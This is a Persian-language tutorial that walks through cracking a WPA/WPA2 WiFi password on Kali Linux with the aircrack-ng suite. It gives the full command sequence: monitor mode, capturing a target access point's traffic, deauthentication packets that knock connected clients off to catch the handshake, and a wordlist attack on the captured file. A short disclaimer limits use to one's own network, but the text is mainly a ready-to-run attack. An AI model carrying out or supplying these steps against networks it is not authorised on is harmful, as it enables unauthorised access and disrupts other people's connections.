چگونه با استفاده از کالی لینوکس وای فای WPA/WPA2 را هک کنیم؟

“هک وای فای” واقعا جالب و هیجان انگیز به نظر می رسد. اما در واقع هک کردن وای فای با یک لیست کلمات خوب بسیار ساده تر است. اما این لیست از پسوردها هیچ فایده‌ای ندارد تا زمانی که ما هیچ ایده‌ای در مورد نحوه استفاده از آن  برای شکستن یک hash نداشته باشیم. و قبل از کرک کردن هش، در واقع باید آن را تولید کنیم. بنابراین، در این مقاله به نحوه کرک و هک کردن رمز عبور وای فای WPA/WPA2 در کالی لینوکس پرداخته ایم .

توجه: از روش‌های زیر فقط برای مقاصد آموزشی/آزمایشی در وای‌فای خودتان یا با اجازه مالک استفاده کنید. از این مقاله برای اهداف مخرب استفاده نکنید.

هک وای فای با کالی لینوکس

کالی لینوکس را راه‌اندازی کنید. پنجره ترمینال را باز کنید. و مراحل زیر را انجام دهید.

مرحله ۱: ifconfig : برای مشاهده یا تغییر پیکربندی رابط های شبکه در سیستم خود دستور زیر را وارد کنید

ifconfig

اینجا،

eth0 : اولین رابط اترنت
l0 : رابط Loopback
wlan0 : اولین رابط شبکه بی سیم روی سیستم. ( این چیزی است که ما نیاز داریم. )

مرحله ۲: فرآیندهای فعلی که از رابط WiFi استفاده می کنند را متوقف کنید.

airmon-ng check kill

مرحله ۳: برای راه اندازی wlan0 در حالت مانیتور دستور زیر را در ترمینال وارد می کنید.

airmon-ng start wlan0

مرحله ۴: برای مشاهده تمام شبکه های Wifi اطراف خود.

airodump-ng wlan0mon

اینجا،

airodump-ng : برای گرفتن بسته
wlan0mon : نام رابط (این نام می تواند در دستگاه های مختلف متفاوت باشد)
Ctrl+C را فشار دهید تا وقتی شبکه مورد نظر را پیدا کردید، فرآیند را متوقف کنید.

مرحله ۵: برای مشاهده کلاینت های متصل به شبکه هدف.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

اینجا،

airodump-ng : برای گرفتن بسته
-c : کانال
–bssid : آدرس MAC یک نقطه دسترسی بی سیم ( WAP ).
-w : دایرکتوری که می خواهید فایل را در آن ذخیره کنید (فایل رمز عبور).
wlan0mon : نام رابط.

مرحله ۶: یک پنجره ترمینال جدید باز کنید تا کلاینت های متصل به شبکه هدف را قطع کنید.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

aireplay-ng : برای تزریق فریم
-۰ : برای احراز هویت
۱۰ : تعداد بسته های احراز هویت برای ارسال
-a : برای bssid شبکه هدف
wlan0mon : نام رابط.

زمانی که کلاینت از شبکه هدف قطع می شود. او سعی می کند دوباره به شبکه وصل شود و وقتی این کار را کرد، چیزی به نام WPA handshake در پنجره قبلی ترمینال دریافت خواهید کرد.

اکنون، ما با گرفتن بسته ها کارمان تمام شده است . بنابراین، حالا می توانید پنجره ترمینال را ببندید.

مرحله ۷. رمزگشایی رمز عبور برنامه Files را باز کنید.

اینجا،

hacking-01.cap فایلی است که شما نیاز دارید.

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

aircrack-ng : برنامه شکستن کلیدهای WEP و WPA-PSK 802.11
-a : -a2 برای WPA2 و -a برای شبکه WPA
-b :  همان BSSID شبکه هدف
-w : محل فایل wordlist
/root/hacking-01.cap : محل فایل cap

می توانید فایل رمزهای عبور رایج را از اینترنت دانلود کنید و اگر می خواهید فایل خود را بسازید می توانید از ابزار crunch استفاده کنید .